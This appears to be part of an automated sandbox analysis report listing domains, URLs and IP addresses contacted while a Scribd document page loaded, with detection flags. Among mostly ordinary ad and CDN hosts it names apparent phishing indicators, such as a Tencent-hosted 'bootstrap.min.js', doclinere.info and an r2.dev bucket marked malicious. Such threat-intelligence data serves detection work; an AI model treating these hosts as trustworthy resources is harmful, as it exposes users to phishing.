                                                                                                                                                                      survey.survicate.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknownfalse
                                                                                                                                                                        high
                                                                                                                                                                        ib.adnxs.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          high
                                                                                                                                                                          analytics.tiktok.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            high
                                                                                                                                                                            login.microsoftonline.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              high
                                                                                                                                                                              www.scribd.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                high
                                                                                                                                                                                imgv2-1-f.scribdassets.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  imgv2-2-f.scribdassets.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    rp.liadm.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      b1sync.zemanta.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                        https://imgv2-1-f.scribdassets.com/img/word_document/308030757/149x198/2af38cbda9/1731726615?v=1false
                                                                                                                                                                                          high
                                                                                                                                                                                          https://s-f.scribdassets.com/webpack/doc_page/152.a74e3e.jsfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://rphfymzrfvbgvnwbxgqz.constructappsolution.com/false
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://w3-reporting-nel.reddit.com/reportsfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetryfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://s-f.scribdassets.com/webpack/doc_page/42.4541ec.jsfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://wa.scribd.com/api/v1/eventsfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.com/bootstrap.min.jsfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://s-f.scribdassets.com/scribd.ico?de2a209e8?v=5false
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.scribd.com/doc-page/personalizationfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://doclinere.info/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://cmp.osano.com/false
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://survey.survicate.com/workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.jsfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://imgv2-1-f.scribdassets.com/img/word_document/309859835/149x198/394d1573f0/1716986829?v=1false
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://imgv2-1-f.scribdassets.com/img/word_document/322011391/149x198/14bbaf98d5/1733344475?v=1false
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://m.stripe.network/inner.htmlfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://s-f.scribdassets.com/webpack/doc_page/594.df1383.jsfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://cdn.siftscience.com/s.jsfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://m.stripe.com/6false
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://s-f.scribdassets.com/webpack/doc_page/205.e3b3b6.jsfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://imgv2-2-f.scribdassets.com/img/word_document/211302755/149x198/e130bab094/1733400677?v=1false
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://s.yimg.com/wi/config/10143699.jsonfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://analytics.twitter.com/i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31false
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                https://b.stripecdn.com/mkt-statics-srv/assets/CodeEditorAutocomplete-dc62d89d9e2121e48baf.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://b.stripecdn.com/mkt-statics-srv/assets/CustomersCaseStudyCarouselNavItem-fd5a8f8fac232f661b3chromecache_206.2.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://b.stripecdn.com/mkt-statics-srv/assets/StripeSet-423109ad4bf57a2a011c.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://docs.stripe.comchromecache_206.2.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://ampcid.google.com/v1/publisher:getClientIdchromecache_223.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://ib.adnxs.com/getuid?https://i.liadm.com/s/81081?bidder_id=91218&bidder_uuid=$UID&gdpr=0&us_pchromecache_302.2.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://b.stripecdn.com/mkt-statics-srv/assets/CodeEditorStatusBar-24c7c84123b2b6e4f091.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorStickyAnimation-4ea4d6a5e9b414987337.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://github.com/twbs/bootstrap/graphs/contributors)chromecache_188.2.dr, chromecache_216.2.dr, chromecache_278.2.dr, chromecache_310.2.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://www.scribd.com/webpack/doc_page/768.555ee4.js.mapchromecache_284.2.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://b.stripecdn.com/mkt-statics-srv/assets/Field-ea906aa31d4012757deb.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://stripe.com/iechromecache_206.2.drfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        https://b.stripecdn.com/mkt-statics-srv/assets/CustomersCaseStudyCarouselNavTrack-1380f9c2e275695c5echromecache_206.2.drfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          https://docs.stripe.com/stripe-appschromecache_206.2.drfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            https://b.stripecdn.com/mkt-statics-srv/assets/Stripe-b3679504f08482f96a0d.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              https://docs.stripe.com/developmentchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                https://docs.stripe.com/no-code/payment-linkschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  https://stripe.com/inchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                    https://b.stripecdn.com/mkt-statics-srv/assets/f965fdf4.woff2chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                      https://www.scribd.com/webpack/doc_page/245.799c3a.js.mapchromecache_172.2.dr, chromecache_253.2.drfalse
                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                        https://stripe.com/itchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                          https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorConnectGraphicCell-18f4786ec794a3671860.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                            https://cdn-assets-prod.s3.amazonaws.com/js/preview2/24721610109.jschromecache_246.2.dr, chromecache_304.2.drfalse
                                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            https://www.scribd.com/webpack/doc_page/runtime.1f8e26.js.mapchromecache_217.2.dr, chromecache_262.2.drfalse
                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                              https://www.scribd.com/webpack/doc_page/42.4541ec.js.mapchromecache_305.2.drfalse
                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                https://stripe.com/#organizationchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                  https://www.scribd.com/webpack/doc_page/452.fc7ddf.js.mapchromecache_180.2.drfalse
                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                    https://images.stripeassets.com/fzn2n1nzq965/5F0uhf7cRg9vhR6NmgWzzI/664e14ddebb91375f89f8dcc75242dc0chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                      https://stripe.com/jpchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                        https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorBillingGraphicTier-c39e78ce45a9380bf169.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                          https://dashboard.stripe.com/chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                                            https://docs.stripe.com/no-code/tap-to-paychromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                                              https://www.google.com/pagead/1p-user-list/991817613/?randomchromecache_190.2.dr, chromecache_315.2.drfalse
                                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                                https://b.stripecdn.com/mkt-statics-srv/assets/GlobalizationPicker-cb59e0de1d5c3aeaa184.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                                  https://dis.criteo.com/dis/usersync.aspx?r=77&p=311&cp=liveintent&cu=1&url=https://i.liadm.com/s/282chromecache_302.2.drfalse
                                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                                    https://b.stripecdn.com/mkt-statics-srv/assets/HorizontalOverflowContainer-0b85e8f46a0db21a6ef9.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                                      https://stripe.com/sv-fichromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                                        https://support.stripe.com/?referrerLocale=en-uschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                                          https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorSuiteAnimation-683958a93f82ca151ea7.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                                                            https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorSubanimation-b9163916332f2a67d464.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                                                              https://stripesessions.com/?utm_medium=owned-surfaces&utm_source=45e0&utm_campaign=US%2FCA_40cb&utm_chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                                                https://b.stripecdn.com/mkt-statics-srv/assets/ProductListing-3e17d7acee941b127dd1.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                                                  https://stripe.com/dechromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                                                    https://www.scribd.com/webpack/doc_page/213.76c9ff.js.mapchromecache_286.2.drfalse
                                                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                                                      https://github.com/getsentry/sentry-javascriptchromecache_198.2.dr, chromecache_211.2.dr, chromecache_238.2.dr, chromecache_183.2.drfalse
                                                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                                                        https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorPaymentsAnimation-71bdbfda51a40294b593.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                                                          https://docs.stripe.com/payments/checkoutchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                                                                            https://dashboard.stripe.com/registerchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                                                                              https://assets.stripeassets.com/fzn2n1nzq965/01hMKr6nEEGVfOuhsaMIXQ/c424849423b5f036a8892afa09ac38c7chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                                                                https://b.stripecdn.com/mkt-statics-srv/assets/CodeEditor-6eacb8e42c7465ddd557.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                                                                  https://getbootstrap.com/)chromecache_188.2.dr, chromecache_216.2.drfalse
                                                                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                                                                    https://stripe.com/zh-hkchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                                                                      https://b1sync.zemanta.com/usersync/liveintent/?cb=//i.liadm.com/s/35004?bidder_id%3D98254%26bidder_chromecache_302.2.drfalse
                                                                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                                                                        https://stripe.com/contact/saleschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                                                                          https://stripe.com/eschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                                                                                            https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorConnectFlowDiagramOrderNotification-12b17d16chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                                                                                              https://b.stripecdn.com/mkt-statics-srv/assets/MobileStickyNav-5c229e49df6b7e5315d7.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                                                                                https://stripe.com/gbchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                                                                                  https://www.linkedin.com/company/stripe/chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                                                                                    https://images.stripeassets.com/fzn2n1nzq965/4zeFefnpB8yh7U3qSQRktP/d583ee93dd3d8910fa27296748699a0fchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                                                                                      https://images.stripeassets.com/fzn2n1nzq965/7C4ROeiaqUa0HwwBU9EL9l/f9c57cccfc64de8869be7e7a9556fec9chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                                                                                        https://images.stripeassets.com/fzn2n1nzq965/7jjWJlm9NHgLI7SV98B0Dg/ea1ae753f3764897fa4333311e41f496chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                                                                                          https://adservice.google.com/pagead/regclk?chromecache_247.2.drfalse
                                                                                                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                                                                                                            https://b.stripecdn.com/mkt-statics-srv/assets/Globe-b2159f87180df559d2e8.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                                                                                                              https://stripe.com/frchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                                                                                                https://b.stripecdn.com/mkt-statics-srv/assets/AnimatedCodeEditor-86776e0635434fc49715.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                                                                                                  https://td.doubleclick.net/td/buyer.wasmchromecache_296.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                                                                                                    https://b.stripecdn.com/mkt-statics-srv/assets/CustomersCaseStudyCardOverlay-09e527d11b6471566771.cschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                                                                                                      https://stripe.com/zh-sgchromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                                                                                                        https://b.stripecdn.com/mkt-statics-srv/assets/RowLayout-9272a8ee72d3dac4a6ef.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                                                                                                          https://b.stripecdn.com/mkt-statics-srv/assets/FrontdoorGraphicImage-ff4d221174ca6cab4402.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                                                                                                                            https://app.optimizely.com/js/innie.jschromecache_246.2.dr, chromecache_304.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                                                                                                                              https://b.stripecdn.com/mkt-statics-srv/assets/BrandModalGraphic-e9e1fc8f4c2bf8a9bd44.csschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                                                                                                                https://docs.stripe.com/librarieschromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                                                                                                                  https://images.stripeassets.com/fzn2n1nzq965/5C5LvT3YZvRTGYn7uabXGj/7da8063dc77c67b7f66a1479f47409c8chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                                                                                                                    https://www.redditstatic.com/ads/49267bce/pixel.jschromecache_185.2.dr, chromecache_224.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                                                                                                                      https://b.stripecdn.com/mkt-statics-srv/assets/f965fdf4.woff2)chromecache_206.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                        151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        scribd.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        172.217.19.226
                                                                                                                                                                                                                                                                                                                                                                                        googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        172.217.17.66
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        18.165.220.24
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        35.186.247.156
                                                                                                                                                                                                                                                                                                                                                                                        sentry.ioUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        34.96.67.224
                                                                                                                                                                                                                                                                                                                                                                                        cdn.prod.gcp.sift.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.130.137
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        3.164.182.6
                                                                                                                                                                                                                                                                                                                                                                                        detgh1asa1dg4.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                                        dualstack.reddit.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        52.87.69.230
                                                                                                                                                                                                                                                                                                                                                                                        tattle.api.osano.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        170.106.97.198
                                                                                                                                                                                                                                                                                                                                                                                        cos.na-siliconvalley.myqcloud.comSingapore
                                                                                                                                                                                                                                                                                                                                                                                        132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                                                                                                                                                                                                                                                                                        185.89.210.20
                                                                                                                                                                                                                                                                                                                                                                                        ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                                                                                                                                                                                        29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        172.66.0.235
                                                                                                                                                                                                                                                                                                                                                                                        pub-28cbd5bc68cb4c26b93f263849a029cc.r2.devUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                                                                                                        170.106.97.196
                                                                                                                                                                                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                                                                                                                                                                                        132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                                                                                                                                                                                                                                                                                        35.190.80.1
                                                                                                                                                                                                                                                                                                                                                                                        a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        35.71.131.137
                                                                                                                                                                                                                                                                                                                                                                                        match.adsrvr.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                                        237MERIT-AS-14USfalse
                                                                                                                                                                                                                                                                                                                                                                                        52.222.144.58
                                                                                                                                                                                                                                                                                                                                                                                        d1tcqh4bio8cty.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        162.159.140.229
                                                                                                                                                                                                                                                                                                                                                                                        t.coUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        172.217.17.78
                                                                                                                                                                                                                                                                                                                                                                                        google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        157.240.195.15
                                                                                                                                                                                                                                                                                                                                                                                        scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        104.21.89.87
                                                                                                                                                                                                                                                                                                                                                                                        rphfymzrfvbgvnwbxgqz.constructappsolution.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        104.244.42.131
                                                                                                                                                                                                                                                                                                                                                                                        s.twitter.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13414TWITTERUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        216.137.52.91
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        8014BATELNETBSfalse
                                                                                                                                                                                                                                                                                                                                                                                        54.171.122.26
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                                                                                                                                                                        152.199.21.175
                                                                                                                                                                                                                                                                                                                                                                                        sni1gl.wpc.omegacdn.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15133EDGECASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        54.246.144.89
                                                                                                                                                                                                                                                                                                                                                                                        spdc-global.pbp.gysm.yahoodns.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        52.73.207.134
                                                                                                                                                                                                                                                                                                                                                                                        idaas-ext.cph.liveintent.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        34.102.232.42
                                                                                                                                                                                                                                                                                                                                                                                        hexagon-analytics.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        64.233.167.154
                                                                                                                                                                                                                                                                                                                                                                                        stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        52.30.58.64
                                                                                                                                                                                                                                                                                                                                                                                        stripe.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        18.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        d2gt2ux04o03l1.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        104.18.66.57
                                                                                                                                                                                                                                                                                                                                                                                        cdn.optimizely.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        13.107.246.63
                                                                                                                                                                                                                                                                                                                                                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        104.18.10.207
                                                                                                                                                                                                                                                                                                                                                                                        maxcdn.bootstrapcdn.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        3.164.182.86
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        44.221.168.224
                                                                                                                                                                                                                                                                                                                                                                                        livepixel-production.bln.liveintent.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        54.198.45.212
                                                                                                                                                                                                                                                                                                                                                                                        mid.rkdms.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        172.67.135.2
                                                                                                                                                                                                                                                                                                                                                                                        doclinere.infoUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                                                                                                        35.164.166.224
                                                                                                                                                                                                                                                                                                                                                                                        m.stripe.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        46.228.164.13
                                                                                                                                                                                                                                                                                                                                                                                        d-ams1.turn.comUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                        56396TURNGBfalse
                                                                                                                                                                                                                                                                                                                                                                                        52.222.144.7
                                                                                                                                                                                                                                                                                                                                                                                        consent.api.osano.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        188.125.88.206
                                                                                                                                                                                                                                                                                                                                                                                        edge.gycpi.b.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                        10310YAHOO-1USfalse
